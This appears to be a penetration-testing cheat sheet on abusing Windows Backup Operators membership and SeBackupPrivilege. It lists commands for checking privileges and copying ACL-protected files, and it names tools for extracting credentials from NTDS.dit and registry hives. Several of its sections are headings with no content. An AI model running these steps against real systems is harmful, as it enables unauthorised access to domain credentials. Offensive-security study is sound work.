8.Windows-built-in-groups

Approach to Exploiting Windows Built-in Groups (Focus: Backup Operators)

Identify Group Memberships:

whoami /groups  # Check if the user is in "Backup Operators"

Verify SeBackupPrivilege:

whoami /priv  # Check if SeBackupPrivilege is present
Get-SeBackupPrivilege  # PowerShell cmdlet

Enable SeBackupPrivilege (if needed):

Set-SeBackupPrivilege  # PowerShell cmdlet

Import SeBackupPrivilege Modules:

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Access Protected Files:

dir <protected_directory>  # Verify lack of access
Copy-FileSeBackupPrivilege <protected_file> <destination>
robocopy /B <source> <destination> <file>

Target Domain Controller (NTDS.dit):

Backup Registry Hives:

Extract Credentials (NTDS.dit):

Commands:

PowerShell Cmdlets:

Tools:

  • diskshadow.exe (Windows built-in)

  • reg.exe (Windows built-in)

  • secretsdump.py (Impacket)

  • robocopy.exe (Windows built-in)

  • DSInternals (PowerShell module)

  • SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll (Custom PowerShell modules)

Techniques:

  • Leverage SeBackupPrivilege to bypass file ACLs.

  • Use diskshadow to create shadow copies of locked files.

  • Extract credentials from NTDS.dit and registry hives.

  • Use robocopy as an alternative to custom scripts.

Last updated